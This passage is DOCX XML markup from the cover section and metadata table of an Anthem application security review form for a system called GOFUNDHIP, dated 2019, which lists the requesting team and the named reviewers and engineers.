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4"/>
        <w:gridCol w:w="6366"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E5E18" w:rsidRPr="00397EF0" w14:paraId="64C6D345" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:trPr>
          <w:trHeight w:val="1477"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A376BFD" w14:textId="77777777" w:rsidR="004E5E18" w:rsidRPr="00397EF0" w:rsidRDefault="00861512" w:rsidP="004E5E18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:color w:val="003366"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="521B9E3B" wp14:editId="08922357">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>238125</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>412750</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1447800" cy="390525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21073"/>
                      <wp:lineTo x="21316" y="21073"/>
                      <wp:lineTo x="213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HEM_logo.gif"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId11">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1447800" cy="390525"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="004E5E18" w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="003366"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Information Security Department</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3684B4" w14:textId="77777777" w:rsidR="004E5E18" w:rsidRPr="00397EF0" w:rsidRDefault="004E5E18" w:rsidP="004E5E18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="003366"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558DC548" w14:textId="77777777" w:rsidR="004E5E18" w:rsidRPr="00397EF0" w:rsidRDefault="004E5E18" w:rsidP="004E5E18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AD63778" w14:textId="77777777" w:rsidR="004E5E18" w:rsidRPr="00397EF0" w:rsidRDefault="004E5E18" w:rsidP="004E5E18">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="471AC80A" w14:textId="77777777" w:rsidR="004E5E18" w:rsidRPr="00397EF0" w:rsidRDefault="00AA7AE4" w:rsidP="004E5E18">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Application </w:t>
            </w:r>
            <w:r w:rsidR="004E5E18" w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security Review</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6979127A" w14:textId="77777777" w:rsidR="004E5E18" w:rsidRPr="00397EF0" w:rsidRDefault="004E5E18" w:rsidP="004E5E18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AA3EF0F" w14:textId="77777777" w:rsidR="004E5E18" w:rsidRPr="00397EF0" w:rsidRDefault="004E5E18" w:rsidP="004E5E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E16E8FE" w14:textId="77777777" w:rsidR="000344DD" w:rsidRPr="00397EF0" w:rsidRDefault="004E5E18" w:rsidP="003E4A82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This form is provided for solutions, frameworks, systems, technologies, projects</w:t>
      </w:r>
      <w:r w:rsidR="00AE01DD" w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or processes that </w:t>
      </w:r>
      <w:r w:rsidR="002E187B" w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Application </w:t>
      </w:r>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Security has been asked to assess or review as part of the overall Information Security program. This </w:t>
      </w:r>
      <w:r w:rsidR="002E187B" w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Application Security</w:t>
      </w:r>
      <w:r w:rsidR="005D6A61" w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Review Form </w:t>
      </w:r>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a method of documenting and communicating that a formal </w:t>
      </w:r>
      <w:r w:rsidR="00AE01DD" w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Application Securit</w:t>
      </w:r>
      <w:r w:rsidR="002E187B" w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> assessment and review has been completed, and that the solution, framework, system, technology, project</w:t>
      </w:r>
      <w:r w:rsidR="00AE01DD" w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or process may move forward, be installed</w:t>
      </w:r>
      <w:r w:rsidR="00AE01DD" w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or be implemented within the </w:t>
      </w:r>
      <w:r w:rsidR="00861512" w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Anthem</w:t>
      </w:r>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> business environment.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6480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00126328" w:rsidRPr="00397EF0" w14:paraId="1D19E020" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF52A40" w14:textId="77777777" w:rsidR="00126328" w:rsidRPr="00397EF0" w:rsidRDefault="00126328" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Application / System Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B6281C9" w14:textId="77777777" w:rsidR="00126328" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>GOFUNDHIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126328" w:rsidRPr="00397EF0" w14:paraId="6EED34AC" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04B7F8E1" w14:textId="77777777" w:rsidR="00126328" w:rsidRPr="00397EF0" w:rsidRDefault="00126328" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20D38DA2" w14:textId="77777777" w:rsidR="00126328" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00861512">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5/31/2019</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006509D2" w:rsidRPr="00397EF0" w14:paraId="4A827FE4" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D0AACDD" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Requesting Team or Organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D964FDC" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00861512">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Shopper Portals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006509D2" w:rsidRPr="00397EF0" w14:paraId="7CCACE3A" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B7126EC" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Primary Security Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EEEDE17" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="00861512">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Application Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006509D2" w:rsidRPr="00397EF0" w14:paraId="1B8064FE" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B5677EA" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Target Area or Primary Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F4314C4" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00861512">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Third-Party </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Payment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006509D2" w:rsidRPr="00397EF0" w14:paraId="32C0B3BA" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27AF2A2F" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Advisor Responsible for Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05F2129D" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00861512">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Jacob A. Thompson, Security Analyst III, Application Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006509D2" w:rsidRPr="00397EF0" w14:paraId="6BE8FFFD" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25BBC43C" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technology Team POC(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F63E739" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rajkumar Ganesan, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F03F96">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Engineer III, Shopper Experience </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00F03F96">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Portal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26AA3CBE" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F03F96">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sri Hari Prasath Swaminathan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F03F96">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Shopper Experience - Portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006509D2" w:rsidRPr="00397EF0" w14:paraId="0F332A1F" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64B18B3D" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Business Team POC(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A378698" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="00861512">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006509D2" w:rsidRPr="00397EF0" w14:paraId="3B580AEE" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38E3A3E1" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vendor POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1012C68F" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="00861512">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006509D2" w:rsidRPr="00397EF0" w14:paraId="57E6E490" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
